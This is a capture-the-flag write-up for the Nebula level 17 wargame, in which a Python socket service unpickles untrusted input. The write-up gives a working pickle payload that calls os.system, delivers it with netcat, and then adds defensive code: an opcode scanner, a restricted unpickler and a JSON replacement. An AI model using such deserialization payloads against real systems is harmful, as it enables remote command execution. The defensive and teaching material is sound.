Level17 dictates, “There is a python script listening on port 10007 that contains a vulnerability.”
Python! Nice. The nebula war game is using a variety of languages, which is fantastic. We are provided with the following source code:
```python
#!/usr/bin/python
import os
import pickle
import time
import socket
import signal

# reap finished child processes automatically so they do not linger as zombies
signal.signal(signal.SIGCHLD, signal.SIG_IGN)

def server(skt):
    line = skt.recv(1024)

    # the vulnerability: bytes straight off the network go to pickle.loads
    obj = pickle.loads(line)

    for i in obj:
        skt.send("why did you send me " + i + "?\n")

skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
skt.bind(('0.0.0.0', 10007))
skt.listen(10)

while True:
    clnt, addr = skt.accept()

    # one forked child per connection; addr is an (ip, port) tuple
    if(os.fork() == 0):
        clnt.send("Accepted connection from %s:%d" % (addr[0], addr[1]))
        server(clnt)
        exit(1)
```
I won’t spoil it, but I learned about pickle over at pythonchallenge.com. Do some additional research if you are not familiar with it.
The majority of the information on pickle will present you with this warning:
Warning: The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
Never trust the user :)
Let’s craft some malicious data:
```
level17@nebula:~$ cat foo
cos
system
(S'getflag > /home/flag17/output'
tR.
```
This data, when deserialized, instructs the system to run ‘getflag > /home/flag17/output’: the `c` opcode resolves os.system and `R` calls it with the quoted string as its argument, all before pickle.loads ever returns. Let’s direct it at the listener using netcat.
```
level17@nebula:~$ nc localhost 10007 < foo
Accepted connection from 127.0.0.1:44614^C
level17@nebula:~$ cat /home/flag17/output
You have successfully executed getflag on a target account
```
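Before moving on, the defender's view of the same bug. The block below is an added example written for this write-up, not code from the Nebula level or from the original post. It takes the payload shown above as input only to show how it can be recognised without ever being executed: pickletools.genops disassembles the opcode stream and reports every GLOBAL or STACK_GLOBAL import, a pickle.Unpickler subclass with find_class overridden refuses all globals, and parse_request is a JSON-based stand-in for the pickle.loads call in the server, which only ever needs a list of strings. The names PAGE_PAYLOAD, BENIGN, CLASS_REF, find_globals, restricted_loads, is_rejected and parse_request are this example's own; BENIGN and CLASS_REF are constructed inputs, the latter a protocol-4 pickle of a class object used only to exercise the STACK_GLOBAL path that the protocol-0 payload does not take.

```python
import io
import json
import pickle
import pickletools

# The pickle payload shown in the write-up above (protocol 0, text form). It is
# used here only as input to the opcode scanner and the restricted unpickler;
# it is never passed to pickle.loads().
PAGE_PAYLOAD = b"cos\nsystem\n(S'getflag > /home/flag17/output'\ntR."

# Constructed benign input of the shape the level's server actually expects.
BENIGN = pickle.dumps(["hello", "world"], protocol=0)

# Constructed protocol-4 pickle of a class object: references builtins.int via
# STACK_GLOBAL instead of GLOBAL, so the scanner's second code path is covered.
CLASS_REF = pickle.dumps(int, protocol=4)

# opcodes that push a str onto the stack; STACK_GLOBAL takes module/name from them
_STRING_OPS = {"UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def find_globals(data):
    """List the (module, name) pairs a pickle would import, without running it.

    pickletools.genops only disassembles the opcode stream, so it is safe to
    call on untrusted bytes. Handles GLOBAL (protocols 0-3) and STACK_GLOBAL
    (protocol 4+). For a service that only needs plain data, any non-empty
    result from a client is a detection hit.
    """
    found = []
    strings = []  # recent str pushes, consulted when STACK_GLOBAL appears
    for op, arg, _pos in pickletools.genops(data):
        if op.name in _STRING_OPS:
            strings.append(arg)
        elif op.name == "GLOBAL":
            module, name = arg.split(" ", 1)  # genops joins them with a space
            found.append((module, name))
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:
            found.append((strings[-2], strings[-1]))
    return found


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any global.

    Both GLOBAL and STACK_GLOBAL go through find_class(), so raising here stops
    a payload before REDUCE has anything to call. Plain containers and scalars
    (lists, str, int, ...) still load normally.
    """

    def find_class(self, module, name):
        raise pickle.UnpicklingError(
            "refusing to import %s.%s from untrusted pickle" % (module, name))


def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_rejected(data):
    """True if the restricted unpickler refuses the data."""
    try:
        restricted_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


def parse_request(line):
    """Drop-in replacement for pickle.loads in the level's server loop.

    The server only iterates over a list of strings, so JSON plus a shape
    check gives the same functionality with no code-execution surface.
    """
    obj = json.loads(line.decode("utf-8"))
    if not isinstance(obj, list) or not all(isinstance(i, str) for i in obj):
        raise ValueError("expected a JSON list of strings")
    return obj


if __name__ == "__main__":
    print("globals in page payload:", find_globals(PAGE_PAYLOAD))
    print("globals in benign pickle:", find_globals(BENIGN))
    print("globals in class reference:", find_globals(CLASS_REF))
    print("restricted load of benign:", restricted_loads(BENIGN))
    print("payload rejected:", is_rejected(PAGE_PAYLOAD))
    print("json request:", parse_request(b'["hello", "world"]'))
```

The scanner is a detection aid for logs or a network sensor; the real fix for a service like this one is the last function, since a format with no object model cannot be turned into a function call no matter what a client sends.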
Woo, on to the next level!